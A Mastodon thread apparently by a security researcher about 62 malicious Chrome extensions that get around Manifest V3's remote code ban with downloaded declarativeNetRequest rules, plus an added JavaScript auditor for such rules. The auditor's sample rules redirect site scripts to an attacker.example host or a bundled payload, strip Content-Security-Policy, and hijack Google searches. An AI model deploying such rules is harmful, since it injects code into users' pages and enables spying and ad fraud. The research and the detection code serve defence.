Published a new article: Malicious extensions circumvent Google’s remote code ban
https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/
Looking at 60 malicious extensions belonging to three groups here, still running remote code despite Google banning it in Manifest V3. “Fun” fact: some of these extensions have been featured on my blog in 2023, others on McAfee’s in 2022.
Recurring pattern: downloading rules and adding them to declarativeNetRequest API. The abuse potential here is enormous, including injecting malicious scripts into websites.
Only one extension went for essentially a custom programming language; the others settled for simpler approaches. Luckily for me, because the latter allow better guesses about what this functionality is meant for. Spoiler: ads and affiliate fraud. Also: affiliate fraud and ads.
=> More information about this toot | More toots from WPalant@infosec.exchange
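As an added illustration of the "downloading rules and adding them to declarativeNetRequest" pattern described in the toot above (example code written for this page, not from the article or from any of the extensions it examines): a static audit of a rule list such as an extension would fetch from its server and hand to `chrome.declarativeNetRequest.updateDynamicRules`. The rule shape follows the public declarativeNetRequest schema; the sample rules, the host names in them and the `allowedRedirectHosts` allowlist are constructed for this example. It flags the two capabilities that turn "content blocking" into script injection: redirecting script requests somewhere else (a third-party host or a file bundled with the extension), and stripping security headers such as Content-Security-Policy.

```javascript
// Added example, not the article's or the extensions' own code.
// Audits a declarativeNetRequest rule list for injection-capable rules.

const SECURITY_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
  "x-frame-options",
  "cross-origin-opener-policy",
]);

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// Per the declarativeNetRequest docs: when resourceTypes is omitted the rule
// matches every resource type except main_frame, so scripts are included.
function ruleMatchesScripts(cond) {
  if (!cond.resourceTypes) return !(cond.excludedResourceTypes || []).includes("script");
  return cond.resourceTypes.includes("script");
}

// A rule with no URL pattern and no domain restriction applies to every request.
function isUnscoped(cond) {
  const urlFilter = (cond.urlFilter || "").replace(/\*/g, "");
  return !urlFilter && !cond.regexFilter &&
    !(cond.requestDomains && cond.requestDomains.length) &&
    !(cond.initiatorDomains && cond.initiatorDomains.length);
}

// allowedRedirectHosts: hosts the extension may legitimately redirect to
// (assumption: an auditor fills this in from the manifest / known CDN usage).
function auditDnrRules(rules, allowedRedirectHosts = []) {
  const allowed = new Set(allowedRedirectHosts.map((h) => h.toLowerCase()));
  const findings = [];
  for (const rule of rules) {
    const cond = rule.condition || {};
    const action = rule.action || {};
    const scope = isUnscoped(cond) ? "all requests" : "filtered";

    if (action.type === "redirect" && action.redirect) {
      const r = action.redirect;
      let target, offsite;
      if (r.extensionPath) {
        // The site's own resource is replaced by a file shipped in the extension.
        target = "extension file " + r.extensionPath;
        offsite = true;
      } else {
        target = r.url || r.regexSubstitution || "";
        const host = hostOf(target);
        offsite = host === null || !allowed.has(host); // unknown target counts as offsite
      }
      if (offsite) {
        findings.push({
          id: rule.id,
          kind: ruleMatchesScripts(cond) ? "redirect-script" : "redirect-offsite",
          scope,
          detail: `redirects to ${target}`,
        });
      }
    }

    if (action.type === "modifyHeaders") {
      for (const h of action.responseHeaders || []) {
        const name = String(h.header).toLowerCase();
        if (SECURITY_HEADERS.has(name) && (h.operation === "remove" || h.operation === "set")) {
          findings.push({ id: rule.id, kind: "strip-security-header", scope, detail: `${h.operation} ${h.header}` });
        }
      }
    }
  }
  return findings;
}

// Constructed sample "configuration" as an extension might download it.
const REMOTE_RULES = [
  { id: 1, action: { type: "block" },
    condition: { urlFilter: "||tracker.example^", resourceTypes: ["script", "xmlhttprequest"] } },
  { id: 2, priority: 2, action: { type: "redirect", redirect: { url: "https://cdn.attacker.example/inject.js" } },
    condition: { regexFilter: "^https://shop\\.example/static/app\\.js", resourceTypes: ["script"] } },
  { id: 3, action: { type: "modifyHeaders",
      responseHeaders: [{ header: "Content-Security-Policy", operation: "remove" }] },
    condition: { urlFilter: "*", resourceTypes: ["main_frame", "sub_frame"] } },
  { id: 4, action: { type: "redirect", redirect: { regexSubstitution: "https://ads.attacker.example/go?u=\\0" } },
    condition: { regexFilter: "^https://www\\.google\\.com/search", resourceTypes: ["main_frame"] } },
  { id: 5, action: { type: "redirect", redirect: { url: "https://cdn.legit-extension.example/blank.gif" } },
    condition: { urlFilter: "||ads.example^", resourceTypes: ["image"] } },
  { id: 6, action: { type: "redirect", redirect: { extensionPath: "/payload.js" } },
    condition: { urlFilter: "/jquery.min.js", resourceTypes: ["script"] } },
];
const ALLOWED_HOSTS = ["cdn.legit-extension.example"];

for (const f of auditDnrRules(REMOTE_RULES, ALLOWED_HOSTS)) {
  console.log(`rule ${f.id}: ${f.kind} (${f.scope}) ${f.detail}`);
}
```

Rules 1 and 5 are what a blocker legitimately does and produce no finding; rules 2 and 6 swap a site's script for attacker-controlled code, rule 3 removes CSP on every page, and rule 4 rewrites Google search navigations to an offsite host. Any of the flagged kinds appearing in a remotely fetched rule set is reason enough to treat the extension as running remote code in all but name.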
Actually, make that 62 malicious extensions. Thanks to a commenter I found two more malicious ad blockers using the same approach as the EasyNav extension.
=> More information about this toot | More toots from WPalant@infosec.exchange
And now I got hold of some malicious “configurations” used by Phoenix Invicta extensions. As expected, injecting their JavaScript code into all web pages is what they do. That’s some massive power which they use to … 🥁🥁🥁 … spy on people and inject their ads into Google searches, making these ads almost indistinguishable from search results. Oh, and if you look closely they also open up a massive vulnerability in all websites. But it’s not like they would care about that.
Now that is hopefully reason enough for Google to kick these extensions out.
=> More information about this toot | More toots from WPalant@infosec.exchange
@WPalant you can bet if something like uBlock Origin did that Google would be all over it.
=> More information about this toot | More toots from ajn142@infosec.exchange
@ajn142 Why do you think that? There are plenty of malicious ad blockers on my list. I somewhat suspect that Google is quite happy about the ad blockers in CWS being rather shady and low quality on average.
Obviously, no legitimate ad blocker should do that, but that’s a different question.
=> More information about this toot | More toots from WPalant@infosec.exchange
@WPalant my opinion is that Google would care more about “contempt of business model” than about, y’know, actual crimes. I should have been clearer: I didn’t mean that if uBlock Origin were doing malicious stuff Google wouldn’t care, but that if they were finding a way to work around Manifest V3 to continue delivering superior ad blocking, Google would be on them like white on a polar bear in a snowstorm.
=> More information about this toot | More toots from ajn142@infosec.exchange
@ajn142 Ah, that’s probably true. They kicked out Adblock Plus from Play Store because I found a way to do somewhat decent ad blocking on Android – which it isn’t meant for.
=> More information about this toot | More toots from WPalant@infosec.exchange
@WPalant I also didn’t realize you were the Adblock Plus guy 🤣
=> More information about this toot | More toots from ajn142@infosec.exchange